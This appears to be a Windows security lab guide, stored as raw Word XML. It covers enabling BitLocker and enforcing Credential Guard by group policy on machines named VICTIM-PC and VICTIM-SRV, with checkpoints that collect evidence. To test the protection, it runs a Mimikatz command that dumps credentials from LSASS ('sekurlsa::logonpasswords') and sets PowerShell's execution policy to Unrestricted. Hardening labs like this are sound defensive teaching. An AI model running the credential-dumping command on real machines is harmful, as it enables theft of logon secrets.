        <w:t xml:space="preserve"> you will have to reboot twice before to see the BitLocker console on machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DAEE22" w14:textId="1615B542" w:rsidR="00EC0099" w:rsidRDefault="00EC0099" w:rsidP="009D7D36">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59D773BA" w14:textId="2F7F3C25" w:rsidR="001D0546" w:rsidRDefault="001D0546" w:rsidP="001D0546">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Both </w:t>
      </w:r>
      <w:r w:rsidR="0068219A">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>VICTIM-SRV and VICTIM-PC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F33254B" w14:textId="572F43EC" w:rsidR="0068219A" w:rsidRDefault="0068219A" w:rsidP="0068219A">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Enable BitLocker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B77A8C3" w14:textId="2891F883" w:rsidR="0068219A" w:rsidRPr="009D7D36" w:rsidRDefault="0068219A" w:rsidP="0068219A">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Control Panel\All Control Panel Items\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bitlocker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Drive Encryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and select to encrypt System drive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4D9385" w14:textId="64031E42" w:rsidR="0068219A" w:rsidRDefault="0068219A" w:rsidP="0068219A">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>In the wizard select to save the BitLocker recovery key in a file on a share</w:t>
      </w:r>
      <w:r w:rsidR="00551EC5">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068219A">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>\\contoso.lab\INTERNAL\CORP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58042B94" w14:textId="5DB92E99" w:rsidR="0068219A" w:rsidRDefault="0068219A" w:rsidP="0068219A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068219A">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7943231C" wp14:editId="1FA6D153">
            <wp:extent cx="3024210" cy="2338405"/>
            <wp:effectExtent l="0" t="0" r="508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4210" cy="2338405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE215C7" w14:textId="01FD8325" w:rsidR="005F03AD" w:rsidRPr="0068219A" w:rsidRDefault="0068219A" w:rsidP="0068219A">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Complete the encryption process: can be take a long time on VICTIM-SRV and pretty much faster on VICTIM-PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE4A74B" w14:textId="759CD756" w:rsidR="00722743" w:rsidRDefault="00722743"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722743" w14:paraId="19A7D0AF"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41F2C622" w14:textId="77777777" w:rsidR="00722743" w:rsidRDefault="00722743" w:rsidP="00457366">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00722743" w14:paraId="67490A95"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9C720FA" w14:textId="0A5A499E" w:rsidR="00722743" w:rsidRDefault="00722743" w:rsidP="00722743">
            <w:bookmarkStart w:id="43" w:name="_Hlk524113750"/>
            <w:r>
              <w:t xml:space="preserve">Collect PowerShell command </w:t>
            </w:r>
            <w:r w:rsidRPr="00722743">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>Get-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00722743">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>BitLockerVolume</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> output from both VICTIM-PC and VICTIM-SRV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="43"/>
    </w:tbl>
    <w:p w14:paraId="7AFE9CDF" w14:textId="510BE8F9" w:rsidR="00A01861" w:rsidRPr="00EC0099" w:rsidRDefault="00A01861">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0099">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B69D266" w14:textId="1CFE0797" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Hlk524108299"/>
      <w:bookmarkStart w:id="45" w:name="_Toc44075688"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r w:rsidR="00ED41C0">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>: Create group policy to enforce Credential Guard</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="65B97848" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Enable Credential Guard help isolating </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>lsass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> environment to prevent credential thief.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17484B35" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRPr="00BB3100" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B79FD0E" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:r>
        <w:t xml:space="preserve">Take time to read this article and related pointers: </w:t>
      </w:r>
      <w:hyperlink r:id="rId56" w:history="1">
        <w:r w:rsidRPr="009D647E">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21EDE2E5" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:r>
        <w:t xml:space="preserve">Run steps described in article </w:t>
      </w:r>
      <w:hyperlink r:id="rId57" w:anchor="enable-credential-guard-by-using-group-policy" w:history="1">
        <w:r w:rsidRPr="009D647E">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage#enable-credential-guard-by-using-group-policy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E2638BE" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07"/>
    <w:p w14:paraId="5B5BAAC9" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In GPMC on VICTIM-DC create new GPO in </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OU=COMPUTER,OU=LAB,DC=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>contoso,DC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">=lab </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">named </w:t>
      </w:r>
      <w:r w:rsidRPr="00757645">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Lab-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00757645">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CredentialGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B3D216" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidRPr="0036137C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Computer Configuration/Administrative Templates/System/Device Guard</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8F7381" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable and edit "Turn </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>On</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Virtualization Based Security".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694EE9B6" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidRPr="00757645">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Select Platform Security Level</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> box, choose </w:t>
      </w:r>
      <w:r w:rsidRPr="00757645">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Secure Boot and DMA Protection</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1368E0C2" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidRPr="00757645">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Virtualization Based Protection of Code Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00757645">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">box, choose </w:t>
      </w:r>
      <w:r w:rsidRPr="00757645">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Enabled without lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39832CB2" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidRPr="00757645">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Credential Guard Configuration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> box, click </w:t>
      </w:r>
      <w:r w:rsidRPr="00757645">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Enabled with UEFI lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785687AC" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07"/>
    <w:p w14:paraId="2A9FB79D" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Apply GPO on VICTIM-PC ("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00163943">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>gpupdate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00163943">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> /force</w:t>
      </w:r>
      <w:r>
        <w:t>" and reboot).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C53CBB0" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45BA0DFB" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>After reboot, open session on VICTIM-PC with CONTOSO\Administrator account and run elevated PowerShell console, then enter these commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB7375E" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Allow running unsigned scripts: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00163943">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00757645">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00757645">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00757645">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Unrestricted</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D3DB2D" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Check if Credential Guard enable: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00163943">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C:\hack\DG_Readiness_Tool_v3.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00757645">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>\DG_Readiness_Tool_v3.4.ps1 -Ready</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028C38E0" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Force Credential Guard running: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00163943">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C:\hack\DG_Readiness_Tool_v3.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00757645">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>\DG_Readiness_Tool_v3.4.ps1 -Enable -CG</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586E8F96" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Reboot machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24875FC3" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07"/>
    <w:p w14:paraId="78718664" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Check if Credential Guard is running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363DA044" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>From elevated PowerShell prompt enter "</w:t>
      </w:r>
      <w:r w:rsidRPr="00163943">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C:\hack\DG_Readiness_Tool_v3.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00757645">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>\DG_Readiness_Tool_v3.4.ps1 -Ready</w:t>
      </w:r>
      <w:r>
        <w:t>": you should see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753A26F1" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Credential-Guard is enabled and running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE3CC83" w14:textId="5875F44F" w:rsidR="001613B8" w:rsidRDefault="000D4F07" w:rsidP="00C6425D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>HVCI is enabled and running.</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1613B8" w14:paraId="43E545A9" w14:textId="77777777" w:rsidTr="00BB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51299927" w14:textId="77777777" w:rsidR="001613B8" w:rsidRDefault="001613B8" w:rsidP="00BB3100">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001613B8" w14:paraId="2DD0556A" w14:textId="77777777" w:rsidTr="00BB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AE2BBA" w14:textId="45EEF465" w:rsidR="001613B8" w:rsidRDefault="001613B8" w:rsidP="00BB3100">
            <w:bookmarkStart w:id="46" w:name="_Hlk533205444"/>
            <w:r>
              <w:t>Take output of command: “</w:t>
            </w:r>
            <w:r w:rsidR="00211C44">
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="001613B8">
              <w:t>\DG_Readiness_Tool_v3.4.ps1 -Ready</w:t>
            </w:r>
            <w:r>
              <w:t>”.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="46"/>
    </w:tbl>
    <w:p w14:paraId="3000F5D5" w14:textId="77777777" w:rsidR="001613B8" w:rsidRDefault="001613B8" w:rsidP="000D4F07"/>
    <w:p w14:paraId="61A8FD84" w14:textId="402A6D57" w:rsidR="00F12E11" w:rsidRDefault="000D4F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>From task Manager, you should see:</w:t>
      </w:r>
      <w:r w:rsidR="00AA4352">
        <w:t xml:space="preserve"> lsaiso</w:t>
      </w:r>
      <w:r w:rsidR="00F12E11">
        <w:t>.exe process</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F12E11" w14:paraId="038586DA" w14:textId="77777777" w:rsidTr="00BB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2B129908" w14:textId="77777777" w:rsidR="00F12E11" w:rsidRDefault="00F12E11" w:rsidP="00BB3100">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F12E11" w14:paraId="05ED1018" w14:textId="77777777" w:rsidTr="00BB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92FC7D" w14:textId="5E0F71FD" w:rsidR="00F12E11" w:rsidRDefault="00F12E11" w:rsidP="00BB3100">
            <w:bookmarkStart w:id="47" w:name="_Hlk533203519"/>
            <w:r>
              <w:t>Take a screenshot of lsaiso.exe process in Task Manager.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="47"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7933693F" w14:textId="5D528050" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07"/>
    <w:p w14:paraId="44598096" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07"/>
    <w:p w14:paraId="38A6C725" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07"/>
    <w:p w14:paraId="7132A94F" w14:textId="36B17900" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="000D4F07">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to see the output: from elevated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> run command </w:t>
      </w:r>
      <w:bookmarkStart w:id="48" w:name="_Hlk533205271"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE52A7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">c:\hack\mimikatz_trunk\x64\mimikatz.exe </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BE52A7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>privilege::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BE52A7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">debug </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE52A7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE52A7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE52A7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>logonpasswords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE52A7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> exit</w:t>
      </w:r>
      <w:r>
        <w:t>".</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>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0D4F07" w14:paraId="627B5E0D" w14:textId="77777777" w:rsidTr="00BB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1E84AA06" w14:textId="77777777" w:rsidR="000D4F07" w:rsidRDefault="000D4F07" w:rsidP="00BB3100">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D4F07" w14:paraId="166A5AA7" w14:textId="77777777" w:rsidTr="00BB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390465" w14:textId="5C2BDCD9" w:rsidR="000D4F07" w:rsidRDefault="000D4F07">
            <w:r>
              <w:t xml:space="preserve">Collect in LsaIso.txt file the output of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mimikatz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> command</w:t>
            </w:r>
            <w:r w:rsidR="001613B8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="001613B8" w:rsidRPr="001613B8">
